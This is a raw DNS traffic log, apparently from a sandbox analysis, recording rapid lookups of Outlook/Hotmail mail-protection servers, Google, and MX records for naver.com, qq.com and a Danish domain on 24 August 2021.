Aug 24, 2021 08:50:44.689294100 CEST	8.8.8.8	192.168.2.5	0xeb07	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:44.696369886 CEST	8.8.8.8	192.168.2.5	0x670	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:44.696369886 CEST	8.8.8.8	192.168.2.5	0x670	No error (0)	eur.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:45.003446102 CEST	8.8.8.8	192.168.2.5	0xaa6	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:45.003446102 CEST	8.8.8.8	192.168.2.5	0xaa6	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:45.124842882 CEST	8.8.8.8	192.168.2.5	0xff1c	No error (0)	msn-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:45.124842882 CEST	8.8.8.8	192.168.2.5	0xff1c	No error (0)	msn-com.olc.protection.outlook.com		104.47.18.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:45.301238060 CEST	8.8.8.8	192.168.2.5	0x7042	No error (0)	eur.olc.protection.outlook.com		104.47.10.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:45.301238060 CEST	8.8.8.8	192.168.2.5	0x7042	No error (0)	eur.olc.protection.outlook.com		104.47.8.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:45.519933939 CEST	8.8.8.8	192.168.2.5	0xadff	No error (0)	eur.olc.protection.outlook.com		104.47.10.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:45.519933939 CEST	8.8.8.8	192.168.2.5	0xadff	No error (0)	eur.olc.protection.outlook.com		104.47.8.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:45.708118916 CEST	8.8.8.8	192.168.2.5	0x5b64	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:45.708118916 CEST	8.8.8.8	192.168.2.5	0x5b64	No error (0)	eur.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:45.822762012 CEST	8.8.8.8	192.168.2.5	0xef15	No error (0)	live-com.olc.protection.outlook.com		104.47.18.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:45.822762012 CEST	8.8.8.8	192.168.2.5	0xef15	No error (0)	live-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:45.979129076 CEST	8.8.8.8	192.168.2.5	0x1ef	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:45.979129076 CEST	8.8.8.8	192.168.2.5	0x1ef	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.065320015 CEST	8.8.8.8	192.168.2.5	0xee7	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.065320015 CEST	8.8.8.8	192.168.2.5	0xee7	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.197743893 CEST	8.8.8.8	192.168.2.5	0x63c7	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.197743893 CEST	8.8.8.8	192.168.2.5	0x63c7	No error (0)	eur.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.266362906 CEST	8.8.8.8	192.168.2.5	0x63fa	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.266362906 CEST	8.8.8.8	192.168.2.5	0x63fa	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.409661055 CEST	8.8.8.8	192.168.2.5	0x88cd	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.409661055 CEST	8.8.8.8	192.168.2.5	0x88cd	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.551393986 CEST	8.8.8.8	192.168.2.5	0xa069	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.551393986 CEST	8.8.8.8	192.168.2.5	0xa069	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.699656010 CEST	8.8.8.8	192.168.2.5	0xdbbe	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.776031971 CEST	8.8.8.8	192.168.2.5	0x3182	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.840603113 CEST	8.8.8.8	192.168.2.5	0x56c5	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.840603113 CEST	8.8.8.8	192.168.2.5	0x56c5	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.844666958 CEST	8.8.8.8	192.168.2.5	0x37b0	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.849885941 CEST	8.8.8.8	192.168.2.5	0xc8c0	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.849885941 CEST	8.8.8.8	192.168.2.5	0xc8c0	No error (0)	eur.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.068999052 CEST	8.8.8.8	192.168.2.5	0x74c7	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.069834948 CEST	8.8.8.8	192.168.2.5	0x6bb2	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.069834948 CEST	8.8.8.8	192.168.2.5	0x6bb2	No error (0)	eur.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.084439993 CEST	8.8.8.8	192.168.2.5	0x865c	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.084439993 CEST	8.8.8.8	192.168.2.5	0x865c	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.129564047 CEST	8.8.8.8	192.168.2.5	0xc706	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.241079092 CEST	8.8.8.8	192.168.2.5	0x583b	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.263972044 CEST	8.8.8.8	192.168.2.5	0x9e7c	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.263972044 CEST	8.8.8.8	192.168.2.5	0x9e7c	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.305551052 CEST	8.8.8.8	192.168.2.5	0x5a74	No error (0)	naver.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:47.305551052 CEST	8.8.8.8	192.168.2.5	0x5a74	No error (0)	naver.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:47.305551052 CEST	8.8.8.8	192.168.2.5	0x5a74	No error (0)	naver.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:47.315576077 CEST	8.8.8.8	192.168.2.5	0x4ff6	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.362435102 CEST	8.8.8.8	192.168.2.5	0xbea5	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.362435102 CEST	8.8.8.8	192.168.2.5	0xbea5	No error (0)	eur.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.362606049 CEST	8.8.8.8	192.168.2.5	0xa9f2	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.366909981 CEST	8.8.8.8	192.168.2.5	0x680a	No error (0)	mx3.naver.com		125.209.222.14	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.528080940 CEST	8.8.8.8	192.168.2.5	0xa6ec	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.528080940 CEST	8.8.8.8	192.168.2.5	0xa6ec	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.603532076 CEST	8.8.8.8	192.168.2.5	0xb4c4	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.687764883 CEST	8.8.8.8	192.168.2.5	0xe5b5	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.730357885 CEST	8.8.8.8	192.168.2.5	0xbcf4	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.730357885 CEST	8.8.8.8	192.168.2.5	0xbcf4	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.089860916 CEST	8.8.8.8	192.168.2.5	0x7446	No error (0)	eur.olc.protection.outlook.com		104.47.18.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.089860916 CEST	8.8.8.8	192.168.2.5	0x7446	No error (0)	eur.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.217833996 CEST	8.8.8.8	192.168.2.5	0xb354	No error (0)	yabs.yandex.ru		87.250.250.91	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.217833996 CEST	8.8.8.8	192.168.2.5	0xb354	No error (0)	yabs.yandex.ru		93.158.134.91	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.217833996 CEST	8.8.8.8	192.168.2.5	0xb354	No error (0)	yabs.yandex.ru		213.180.204.91	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.297303915 CEST	8.8.8.8	192.168.2.5	0x2809	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.297303915 CEST	8.8.8.8	192.168.2.5	0x2809	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.387979984 CEST	8.8.8.8	192.168.2.5	0x35e7	No error (0)	eur.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.387979984 CEST	8.8.8.8	192.168.2.5	0x35e7	No error (0)	eur.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.492959023 CEST	8.8.8.8	192.168.2.5	0xadfd	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.492959023 CEST	8.8.8.8	192.168.2.5	0xadfd	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.725732088 CEST	8.8.8.8	192.168.2.5	0x10c3	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.725732088 CEST	8.8.8.8	192.168.2.5	0x10c3	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.742047071 CEST	8.8.8.8	192.168.2.5	0xaf2b	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.922950983 CEST	8.8.8.8	192.168.2.5	0xd4c4	No error (0)	eur.olc.protection.outlook.com		104.47.18.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.922950983 CEST	8.8.8.8	192.168.2.5	0xd4c4	No error (0)	eur.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.933299065 CEST	8.8.8.8	192.168.2.5	0x6d0a	No error (0)	outlook-com.olc.protection.outlook.com		104.47.56.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.933299065 CEST	8.8.8.8	192.168.2.5	0x6d0a	No error (0)	outlook-com.olc.protection.outlook.com		104.47.58.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:49.138709068 CEST	8.8.8.8	192.168.2.5	0x8852	No error (0)	live-com.olc.protection.outlook.com		104.47.18.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:49.138709068 CEST	8.8.8.8	192.168.2.5	0x8852	No error (0)	live-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:49.338469982 CEST	8.8.8.8	192.168.2.5	0xfdec	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:49.338469982 CEST	8.8.8.8	192.168.2.5	0xfdec	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:49.564568996 CEST	8.8.8.8	192.168.2.5	0xdc9	No error (0)	msn-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:49.564568996 CEST	8.8.8.8	192.168.2.5	0xdc9	No error (0)	msn-com.olc.protection.outlook.com		104.47.18.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:49.698725939 CEST	8.8.8.8	192.168.2.5	0x3755	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:49.698725939 CEST	8.8.8.8	192.168.2.5	0x3755	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:49.877774000 CEST	8.8.8.8	192.168.2.5	0x8895	No error (0)	qq.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:49.877774000 CEST	8.8.8.8	192.168.2.5	0x8895	No error (0)	qq.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:49.877774000 CEST	8.8.8.8	192.168.2.5	0x8895	No error (0)	qq.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:49.956733942 CEST	8.8.8.8	192.168.2.5	0xad1b	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:49.956733942 CEST	8.8.8.8	192.168.2.5	0xad1b	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:49.964420080 CEST	8.8.8.8	192.168.2.5	0x5121	No error (0)	eur.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:49.964420080 CEST	8.8.8.8	192.168.2.5	0x5121	No error (0)	eur.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:49.966875076 CEST	8.8.8.8	192.168.2.5	0xbb65	No error (0)	mx3.qq.com		203.205.219.57	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:50.194643021 CEST	8.8.8.8	192.168.2.5	0x2ab2	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:50.194643021 CEST	8.8.8.8	192.168.2.5	0x2ab2	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:50.716054916 CEST	8.8.8.8	192.168.2.5	0x3d1f	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:50.793414116 CEST	8.8.8.8	192.168.2.5	0x575	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:50.902594090 CEST	8.8.8.8	192.168.2.5	0x349d	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.004492044 CEST	8.8.8.8	192.168.2.5	0x2115	No error (0)	msn-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.004492044 CEST	8.8.8.8	192.168.2.5	0x2115	No error (0)	msn-com.olc.protection.outlook.com		104.47.18.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.012351990 CEST	8.8.8.8	192.168.2.5	0x1d76	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.012351990 CEST	8.8.8.8	192.168.2.5	0x1d76	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.169329882 CEST	8.8.8.8	192.168.2.5	0x7515	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.261337042 CEST	8.8.8.8	192.168.2.5	0x3a97	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.261337042 CEST	8.8.8.8	192.168.2.5	0x3a97	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.270926952 CEST	8.8.8.8	192.168.2.5	0x1927	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.309531927 CEST	8.8.8.8	192.168.2.5	0x82c8	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.377073050 CEST	8.8.8.8	192.168.2.5	0x8b72	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.452927113 CEST	8.8.8.8	192.168.2.5	0xa998	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.533588886 CEST	8.8.8.8	192.168.2.5	0x89a	No error (0)	msn-com.olc.protection.outlook.com		104.47.4.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.533588886 CEST	8.8.8.8	192.168.2.5	0x89a	No error (0)	msn-com.olc.protection.outlook.com		104.47.6.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.539733887 CEST	8.8.8.8	192.168.2.5	0x14a0	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.539733887 CEST	8.8.8.8	192.168.2.5	0x14a0	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.540167093 CEST	8.8.8.8	192.168.2.5	0xc873	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.599510908 CEST	8.8.8.8	192.168.2.5	0x23ef	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.649600029 CEST	8.8.8.8	192.168.2.5	0x8952	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.731543064 CEST	8.8.8.8	192.168.2.5	0x46ea	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.749413967 CEST	8.8.8.8	192.168.2.5	0xbff9	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.749413967 CEST	8.8.8.8	192.168.2.5	0xbff9	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.822792053 CEST	8.8.8.8	192.168.2.5	0xf1ad	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.919507980 CEST	8.8.8.8	192.168.2.5	0x8e1e	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.997916937 CEST	8.8.8.8	192.168.2.5	0xa32b	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:52.349787951 CEST	8.8.8.8	192.168.2.5	0x98d1	No error (0)	mx3.qq.com		203.205.219.57	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:52.534840107 CEST	8.8.8.8	192.168.2.5	0x139a	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:52.534840107 CEST	8.8.8.8	192.168.2.5	0x139a	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:52.807382107 CEST	8.8.8.8	192.168.2.5	0xf143	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:52.807382107 CEST	8.8.8.8	192.168.2.5	0xf143	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:52.819158077 CEST	8.8.8.8	192.168.2.5	0x7c3	No error (0)	msn-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:52.819158077 CEST	8.8.8.8	192.168.2.5	0x7c3	No error (0)	msn-com.olc.protection.outlook.com		104.47.18.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:53.057209015 CEST	8.8.8.8	192.168.2.5	0x19f9	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:53.057209015 CEST	8.8.8.8	192.168.2.5	0x19f9	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:53.330641031 CEST	8.8.8.8	192.168.2.5	0x5bb2	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:53.330641031 CEST	8.8.8.8	192.168.2.5	0x5bb2	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:53.331918955 CEST	8.8.8.8	192.168.2.5	0x2fba	No error (0)	msn-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:53.331918955 CEST	8.8.8.8	192.168.2.5	0x2fba	No error (0)	msn-com.olc.protection.outlook.com		104.47.18.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:53.594985008 CEST	8.8.8.8	192.168.2.5	0x1400	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:53.594985008 CEST	8.8.8.8	192.168.2.5	0x1400	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:53.682704926 CEST	8.8.8.8	192.168.2.5	0xb0ea	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:53.869530916 CEST	8.8.8.8	192.168.2.5	0xe0aa	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:53.869530916 CEST	8.8.8.8	192.168.2.5	0xe0aa	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:53.903759003 CEST	8.8.8.8	192.168.2.5	0x6e08	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:54.288378954 CEST	8.8.8.8	192.168.2.5	0x9e53	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:54.361656904 CEST	8.8.8.8	192.168.2.5	0xbd46	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:54.448429108 CEST	8.8.8.8	192.168.2.5	0x1021	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:54.528732061 CEST	8.8.8.8	192.168.2.5	0xee72	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:54.574280024 CEST	8.8.8.8	192.168.2.5	0x4b6d	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:54.669553995 CEST	8.8.8.8	192.168.2.5	0x9a1d	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:54.669553995 CEST	8.8.8.8	192.168.2.5	0x9a1d	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:54.887020111 CEST	8.8.8.8	192.168.2.5	0x5b64	No error (0)	hindholmsem.dk			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:54.989808083 CEST	8.8.8.8	192.168.2.5	0x9cd3	No error (0)	mail.happyisp.com		34.212.139.205	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:54.989808083 CEST	8.8.8.8	192.168.2.5	0x9cd3	No error (0)	mail.happyisp.com		34.223.6.127	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:54.989808083 CEST	8.8.8.8	192.168.2.5	0x9cd3	No error (0)	mail.happyisp.com		54.190.26.211	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:54.989808083 CEST	8.8.8.8	192.168.2.5	0x9cd3	No error (0)	mail.happyisp.com		54.244.49.115	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:54.989808083 CEST	8.8.8.8	192.168.2.5	0x9cd3	No error (0)	mail.happyisp.com		34.222.93.91	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:54.989808083 CEST	8.8.8.8	192.168.2.5	0x9cd3	No error (0)	mail.happyisp.com		54.200.93.251	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:54.989808083 CEST	8.8.8.8	192.168.2.5	0x9cd3	No error (0)	mail.happyisp.com		18.237.235.220	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:54.989808083 CEST	8.8.8.8	192.168.2.5	0x9cd3	No error (0)	mail.happyisp.com		34.212.36.67	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:54.989808083 CEST	8.8.8.8	192.168.2.5	0x9cd3	No error (0)	mail.happyisp.com		34.220.245.67	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:54.989808083 CEST	8.8.8.8	192.168.2.5	0x9cd3	No error (0)	mail.happyisp.com		54.187.110.113	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:55.132822037 CEST	8.8.8.8	192.168.2.5	0x2dfa	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:55.132822037 CEST	8.8.8.8	192.168.2.5	0x2dfa	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:55.411355019 CEST	8.8.8.8	192.168.2.5	0xa8a1	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:55.411355019 CEST	8.8.8.8	192.168.2.5	0xa8a1	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:55.418781042 CEST	8.8.8.8	192.168.2.5	0xc39d	No error (0)	live-com.olc.protection.outlook.com		104.47.18.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:55.418781042 CEST	8.8.8.8	192.168.2.5	0xc39d	No error (0)	live-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:55.622045994 CEST	8.8.8.8	192.168.2.5	0x2173	No error (0)	eur.olc.protection.outlook.com		104.47.18.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:55.622045994 CEST	8.8.8.8	192.168.2.5	0x2173	No error (0)	eur.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:55.831067085 CEST	8.8.8.8	192.168.2.5	0xe672	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
